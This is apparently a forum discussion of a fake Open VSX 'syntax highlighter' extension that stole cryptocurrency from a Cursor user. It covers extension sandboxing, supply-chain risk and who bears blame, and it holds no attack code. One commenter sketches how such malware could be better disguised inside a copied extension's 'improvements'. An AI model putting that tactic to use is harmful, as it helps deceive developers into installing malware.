Am I understanding right the extension was free to download code from internet and execute with enough rights to scan the user's disk? That is wild. Does this mean every company is one bad extension install away from having its entire codebase stolen or worse?
I naively assumed the extensions were 'sandboxed' to some degree.
I also naively thought that IDE extensions where sandboxed until I worked myself on making extensions.
Well, it’s absolutely not and you can access the full filesystem. Which is handy if you are legit, but very permissive & much more a security threat than I imagined.
VSCode on MacOS asks me if it can access my Download/Documents/etc folder... and if I trust the files in directory X that I just opened. Yet, extensions can just bypass all those safeguards?
I believe extensions inherit the permissions that the editor has already - so if you've given Cursor or VS Code permission to access a folder any extensions they run later can access it too.
I agree, this seems bad! Sandboxing is still a very weakly implemented craft for most applications, especially those that run extensions or plugins.
(I build a lot of software that runs plugins and has no sandboxing at all, and it really frustrates me. I'm constantly looking out for cross-platform Python-friendly sandboxing tech that might help with this in the future.)
I’m monitoring this area as well. You’ve probably run across these already but extism, a polyglot plugin framework, can be hosted in Python[1] and has evolving support for writing plugins in Python [2]. Another option is container2wasm[3].
I actually tried running clickhouse in container2wasm and it crashed because it only had one CPU core, so YMMV—although that shouldn’t be a problem for Python (or any code custom built for your plugin framework).
For me, I want to avoid separate processes. I definitely want to avoid separate VMs.
> Sandboxing is still a very weakly implemented craft for most applications
voice of decades past -- sandboxing is very well known and deeply implemented in many aspects of ordinary daily computing; sandboxing is endlessly difficult and can be mis-applied; people who want to break into things and steal and wreak havoc ruin software environments for everyone else.
Definitely install something like little snitch and keep an eye out for the requests that come out of vscode.
I’ve become very paranoid with extensions as of late. It’s great that llms have gotten so good and banging out personal tools. I am using a few home grown extensions in my own setup.
Even with just internet access an extension could upload your entire codebase. Git extensions for example need this level of access by design. How else could you set a different remote and push all refs:)
These systems rely on downloading and executing much more untrusted software than you could ever imagine. Please dig deeper into this for yourself, I think that's the only way for anyone to truly appreciate the mess we are getting ourselves into.
This is the allure of shipping software with Electron; you get to use your familiar webdev platform, but with all those pesky security constraints gone. I mean, why else wouldn't you just have people use a web page? (OK, you also get easier access to the Start menu.)
Being a developer of an Electron application myself, it's probably accurate to say that Electron is a NodeJS application with APIs for interacting with instances of web renderers which themselves use a fork of Chromium to render HTML content.
Supply chain attacks really worry me. I do most of my work in docker containers partly as a small attempt to mitigate this. I run the full stack in the container, including Claude Code, Neovim, Postgres, etc.
I do have a fair number of Neovim plugins on my host machine, and a number of Arch packages that I probably could do without.
I’ve considered keeping my host’s Neovim vanilla, but telescope is hard to live without.
Supply chain attacks mean you need to trust your choice of suppliers, trust their security posture and choice of suppliers and so on. Even docker itself has FROM and often a few "apt get" (or similar) commands to build the image. Even with no file access, they can exfiltrate data.
This and MCP, IoT all the things, vibe coding, AI impersonation for social attacks and cryptocurrency rewards it's a golden age for criminal hackers!
You can say the same about the vast majority of distribution methods we have. There's no difference between `curl | sh` and executing a binary you download from the internet.
Checksums and signatures make it slightly better. At least you can go from OK to vulnerable by downloading the same thing as an hour ago. But if you upgrade then yeah.
The number of dependencies that require inordinate amounts of effort to build from a clean repository without network access is truly alarming. Even many core tools can't be bootstrapped (at least easily or in a manner supported by the developers) without downloading opaque binary blobs. It's like the entire software ecosystem is underpinned by sketchy characters hanging out in dark alleys who clandestinely slip you the required binaries if you ask nicely.
Same worries and setup here, with the only difference that I use Nix to either spawn a QEMU VM or build an LXC container that runs on a Chromebook (through Crostini).
I started using throwaway environments, one per project. I try keeping the stuff installed in the host OS to the bare minimum.
For the things I need to run on the host, I try to heavily sandbox it (mostly through the opaque macOS sandbox) so that it cannot access the network and can only access a whitelist of directories. Sandboxing is painful and requires trial an error, so I wish there was a better (UX-wise) way to do that.
Do you use devcontainers or a custom-built solution? Would you mind sharing how you do your dev work using containers? I've been looking to try it out, and this attack might be the tipping point to where I actually do that.
Custom. I have a little script: “dev sh” which creates a new container for whatever folder I’m in. The container has full access to that folder, but nothing else. If there’s a .podman/env file, the script uses that to configure things like ports, etc.
From what I saw of devcontainers, they basically grant access to your entire system (.ssh, etc). May be wrong. That’s my recollection, though.
And yet, this entire class of abuse is only possible because Microsoft refuse to implement any kind of permission management or sandboxing for extensions.
If the team put those filters in place, then it was the team. Anyone implementing automation gets to be held responsible for its failure, but also its successes.
Unfortunately the marketplace ecosystem is why I went back to VSCode from Cursor. I'm a bit upset by this because I don't quite appreciate that Microsoft has a closed ecosystem for the marketplace and does not open it to Cursor but the reality is, that Open VSX does not have all extensions and little vetting.
Well this was an extremely unsophisticated attack. The malware wasn't hidden and they didn't even bother to actually copy the real extension.
If I were doing this I would copy the real extension, give it a name that made it sound official but in the README say it is a tweaked version with some improvements or whatever. Also actually add some improvements, but hide the malware in those changes.
Downloading random code from internet is just normal development on Mac. Brew, npm and other sorts of "package managers".
I have code, passwords and certificates separated in virtual machines, even IDE GUI app is virtualized, and has no rights to access GitHub, internet or filesystem directly.
But I get a lot of flack from coworkers. They say it is unintuitive and uses x86 CPU which is uncool. Mac has no reasonable VM software or secure containers!
There's actually a new setting in vscode (from Dec 24) to configure a whitelist for extensions that are allowed to be installed on a user's machine [0]. It's not foolproof, but it probably helps to prevent common supply chain attacks. I wonder if this could be used in cursor too.
This incident really underscores how AI-powered dev tools, which rely on open-source extension registries like Open VSX, can be weaponized via supply chain abuse. A $500k crypto heist via a bogus “syntax highlighter” signals a scary maturity in these attacks.
Ranking manipulation, using recency and inflated download counts, to outrank the legitimate Solidity package is a clever exploit of how developers search. It makes me wonder: should IDEs start validating package authorship or offer signed extensions as a default?
Also, the fact that this happened on a freshly imaged system with no antivirus suggests we need to rethink trust models for extension marketplaces. Not just for crypto devs, but for any industry sensitive to code integrity.
We're getting back to the old age of antivirus software. Can't wait to install Norton or Kaspersky on my Mac M5. Also good time to start your antivirus ai startup.
Thats why I always develop on a per customer mini VM via VSCode ssh remoting or similar, and projects are usually runned via docker-compose or devcontainers.
But this is not about Cursor. It's a supply chain attack, and a Windows machine running a software wallet. A hardware wallet would make this impossible.
According to wikipedia, organisations with roots in the soviet union, the Donetsk People's Republic, white supremacist websites and cybercrime. So you can probably safely block it unless you're into those kinds of things.
EDIT: also student's unions apparently, which kinda makes sense
Somewhat humorously, my company displayed an IT warning telling me that I can't visit the website in question because it's in Russia. I probably set off some kind of alarm somewhere.
I do use Cursor at work and I have various extensions installed.
I'm always anxious when I download npm packages or when I pip Python packages...tbh it's a gamble because there are so many supply chain attacks and/or malicious developers.
Wrong, bash scripts can pop up a series of permission prompts on macOS if you do a full disk scan. They’re only suppressed when directly run from an application like Terminal that’s already been given full disk access or developer tools permission. In fact, sometimes the syscall just silently fails with no permission popup. For instance I have this python script calling an HTTP endpoint on LAN that when run within tmux would sometimes inexplicably fail with no route to host error because it doesn’t have local network scan permission, there’s no permission prompt, and the only solution is to restart the tmux server.
Not in my case. I only give Terminal and iTerm “Developer Tools” permission. Cursor shows up under “Full Disk Access” with a toggle so it may have requested the permission at some point, but I have it on disable; I don’t see why it needs to reach out of directories I actively open. (And VSCode which I used for years doesn’t even show up there.)
Disclaimer: I’m not sure whether Cursor inherits iTerm’s permissions when launched from CLI. The TCC system is pretty mysterious to me in general.
You know you are in a cycle when some new software/paradigm brings new solutions and approaches while it forgets about basic stuff already implemented for ages by prior solutions. It's basically like an adolescent.
I guess this is how we evolve?
1. Be aware of remote code downloading and execution. VSC extensions are remote code. Try to find out if you trust the source. I trust Debian repos, I certainly do not trust the VSC marketplace.
2. Know the policies around sandboxing. VSC is not a browser, and does no sandboxing at all.
3. Containerize or virtualize the application. If you're on Linux, always use Flatpak. Deny all filesystem permissions except for your root source code directory. This goes for browsers, too. Ideally they should support xdg-download and then have zero file permissions at all - otherwise, only grant ~/Downloads. Don't want a zero-day stealing your files.
4. Keep sensitive data in a separate, encrypted place. On Linux, you can use KDE vaults.
In a perfect world, we wouldn't be downloading and running remote code at all. But for practically, this is untenable. I have JS enabled in my browser. Our best bet is limiting the blast radius when things go south.
Context : Cursor, despite raising $900M, is a vscode fork that uses the open-vsx extension registry. It is maintained by european volunteers at a non-profit, and does not have the resources to check for supply-chain attacks like this.
Freeloading on (and blaming) volunteer infrastructure is irresponsible, especially when you have so much funding.
Cursor, Microsoft, and all the major players in this space should invest heavily in a managed dependency / plugin service, also for the huge amount of nodeJS package. They need a review, scan, certification and warranty program.
Apple did it 15 years ago, time for the rest to catch up. They can turn it into a business by offering enterprise subscriptions for higher guarantees or a warranty.
That's the more general issue, isn't it? Users demand software, guarantees, ... and refuse to pay for it.
That goes for the AI industry itself, but equally for everyone using it.
Microsoft won when it found a way to extract software fees as a tax from hardware manufacturers.
FANG won when it found a way to extract software writing and hosting fees from advertisers, effectively making it a tax on everything you buy.
Both of these (Operating systems and basic cloud services like email hosting) can be done for a lot cheaper if they were paid for by end users, but those just won't pay. In fact, for a while they were paid by end users (microsoft did that, gmx.net, infomaniak, ...). Then everyone switched to "free" and here we are.
And we all know there's no way back, so what's the point discussing it? We all know most people will just not have email or web search if they had to pay even 5$ per year to get it, and I seem to recall an article stating Google effectively earns over $100 per year per account.
Reality is: give it another 2 years and the "art, music, articles, newspapers, books and open source code" industries will reach absolutely nobody except through AI providers. That could be avoided if every creator paid $1 per year to have free infrastructure for their services, but there's no way in hell they will do that ... so here we are. In 2 years instead they'll pay $1000 every time they want someone to actually look at their art.
And yet, the situation with banking services is far worse, imho. So bad, in fact, that even charging $0.01 per year for internet services would be a nonstarter.
Nonetheless, I think this is more a vulnerability in the Open VSIX registry side, than Cursor AI. If anything, the forks and VS Code should block/sandbox extensions by default, or have a granular permission system to allow users to consciously choose whether to allow an extension to use network resources or not.
The title does make it sound like the AI itself lead to the vulnerability, which is false
But cursor isnt off the hook. It wasnt a malicious copy, it was a legit copy of the cursor IDE distirbuting a package they allowed on the extension store. This is on them.
The lesson here is to not make a vscode fork if you arent able to maintian it the way microsoft does. Move fast and break (the user's) things i guess
The article says they use open-vsx, which is managed by the Eclipse foundation. It's not really anything to do with cursor, other than the fact they're allowing you access to the only other vscode marketplace that all the forks use.
The biggest "reveal" here is that open-vsx has far less effective anti-fraud measures than the end users of Cursor, Windsurf, etc. expect.
It seems that an attacker was able to easily manipulate download counts, placing their malicious extension high in search results.
And this is far from the first open-vsx vulnerability in the past month. See: https://blog.koi.security/marketplace-takeover-how-we-couldv... which describes how open-vsx was installing arbitrary packages and running their build scripts in a privileged environment.
With billions of dollars being poured into this ecosystem, it's mind-boggling that security is being treated as such an afterthought. Consider this when choosing tools.
Yes, let's blame the guys working on something for free, instead of the company which raised nearly a billion in VC money but couldn't be bothered to check.
If you run part of the software supply chain ecosystem, put it on the web without any kind of "alpha" or "insecure" language that's highly visible to end users on every package, and even distribute professional white papers and marketing-style landing pages to promote it (e.g. https://outreach.eclipse.foundation/openvsx), but create a deployment architecture that executes arbitrary third party code during every deploy (as was the case before https://github.com/EclipseFdn/publish-extensions/pull/881/fi... landed to fix the issue in the link above) - I do indeed think that the Eclipse Foundation bears some responsibility here.
And for sure, Cursor and others should have funded security hardening of their extension marketplace. The lion's share of the blame lies on that. But the Eclipse Foundation is in a position to incentivize that investment by making it clear to end users that open-vsx is still at an experimental level of stability and security, rather than promoting it as an enterprise-ready product with white papers and all.
There are companies that will provide quality guarantees and product liability insurance for open source software (I work for one in fact), so maybe Cursor should have used one of those.
For sure, but the membership fees these companies pay are really quite small (bottom of this page https://www.eclipse.org/membership/prospectus/), and they mainly go towards infrastructure, running the working groups, and conferences. The projects get some benefits, but they don't get a lot of full time developers (in fact, I'd be surprised if they get even a fraction of 1 FTE), and are largely run either by volunteers or by people doing this in their 20% time in regular day jobs.
In any case, Cursor didn't pay any money here, so they get to keep all the pieces when the code they used for free breaks.
I blame my tool, Cursor. They blame their tool, open-vsx. We're either both right about that logic, or both wrong. Either way, I expect consistency in how the product I pay for assigns/accepts blame. Cursor's response will be interesting.
Cursor does bear significant responsibility in the sense that OpenVSX transformed from a niche service used by free software nerds into a major component of many developers’ process. There were a few months were Cursor were the scrappy upstarts, but now they’re a $200M/year company and they have $200M/year responsibilities. They can’t just wash their hands of it and pretend OpenVSX is a public service.
Why in the open source world do goal posts always move? It’s a public open source service. Speaking purely on this vulnerability, it’s an extension listed in the OpenVSX ecosystem. Regardless if Cursor vetted all of these extensions or not I would still be incredibly hesitant like everyone should be.
Now do we need better solutions? Definitely and I do hope cursor will contribute towards it but I won’t hold them to it. They switched to OpenVSX less than a month ago, too soon to really say much at this point.
I didn’t move any goalposts. Cursor set up the goalposts themselves by making a small volunteer-run service a critical component of their massive for-profit product. It’s greedy and irresponsible.
“Open VSX is an open-source registry for VS Code extensions. It can be used by any development environment that supports such extensions.”
Sure sounds like you are moving goalposts around. Of course I hope Cursor contribute back but it’s been 20days and I am not an insider I have no idea what the plan is.
most of us haven't read the Linux kernel. Some of us even use closed operating systems like Mac OS, Windows or iOS. So this can't possibly be the right standard.
But it is true that certain types of developers will just download anything and integrate it into their development process. And it's also true that this would have been avoided by executing in a sandbox.
I want people to release cool software without the insane burden you describe. If they want to delegate that burden to users or ask them to pay for someone else to assume the burden, great.
I love Cursor. They haven't failed me. I'm not running arbitrary code and I suffer none of the consequences.
Furthermore, it probably literally says you're running random 3rd party code when you use extensions and Cursor is not liable. This is basic human responsibility 101. You are responsible for your own actions.
This seems like a bad faith argument - the risky tools, yes, actually. I do audit them. Or at least poke around for someone who has.
It is easier than ever to do a DIY malware analysis on the tools you use.
“Hi Claude - you are a security researcher and malware analyst. Analyze the FooBar Chrome Browser extension / git repository I just downloaded for security threats and provide me a report on whether this is OK to use”
I know browser / IDE extensions are not usually audited and approved by the tool owner unless specifically noted otherwise. Even phone apps can sneak stuff in. So I am careful to only install things I trust or will audit myself or am willing to take the risk on.
You can dig in your heels on ideals and principles, but it is simply not realistic to expect a 3rd party extension marketplace from a closed source IDE startup run by 24 year olds in the Valley to protect you from all risk. (By the way, nor is it their goal - they are optimizing for breadth of the ecosystem and adoption and growth, not security and guardrails. That would likely cost you a lot more than $20/month.)
If you can figure out how to moderate a system of 3rd party software (or content, really) to protect the user from all bad things while maintaining global-scale content throughput, I suggest you start a company - I’m sure people will pay a lot of money for your capabilities.
I don't trust random 3rd party extensions. They might be trying to screw me. This is the exact reason why I don't touch npm.
I'm not prescribing a formal set of rules by which you should or shouldn't trust things. I'm just a reasonable person.
Cursor is an unrelated 3rd party to this situation, which is probably clearly described in their Terms of Service. Blaming them reeks of denying responsibility for your own actions. If you want Cursor to audit every 3rd party extension, they'd probably want you to pay them for it. Just like every commercially licensed Linux distro.
You understand that the extension was a copy of a genuine extension?
It was a mistake that he installed the duplicate fraudulent extension. For all we know he could have checked the intended extension code line by line, and then went on to install the trojan horse extension by accident.
> The developer was well aware of the cybersecurity risks associated with crypto transactions, so he was vigilant and carefully reviewed his every step while working online.
Tbh it’s literally impossible to use your computer normally and be vigilant enough to protect crypto. No one could ever properly audit everything they run.
That's the reason why Hardware wallets exist. They aren't the panacea, but they drastically increase the separation of your keys from the Internet. Some (like ColdCard) do not ever need to touch an online computer directly.
For small amounts all these mobile/addons/desktop software are fine (with minimum caution like avoiding reckless behavior described in the OP). For larger amounts cold storage (of which hardware wallet are the easiest to deploy) will protect your funds.
When you put cash in your physical wallet you assume that this could be lost to a robber in the streets, with little to no recourse. You wouldn't put all your belongings in a big bag you would carry everywhere you travel, or if you did you would increase your security proportionally to this increased risk... if you don't, nobody would shed a tear over your potential losses.
Not sure how this is different with crypto, I guess people assume everything is safe by default because it has no physical form, despite the 20 warnings and security reminders they get when they setup any crypto wallets.
If you have more than high 5 figures of money lying around, should you be co-mingling it with your everyday activities?
I wouldn't feel particularly comfortable even having 5 figures of tradfi cash lying around in my house let alone carrying it on my laptop where someone could steal my bag or machine and that's before it is connected
In this case it's literally as simple as not developing anything while playing around with a live wallet that has hundreds of thousands of dollars in it.
It's like trying to do vehicle maintenance while your car is running.
It might be technically possible.. but why would you ever do that?
I naively assumed the extensions were 'sandboxed' to some degree.
reply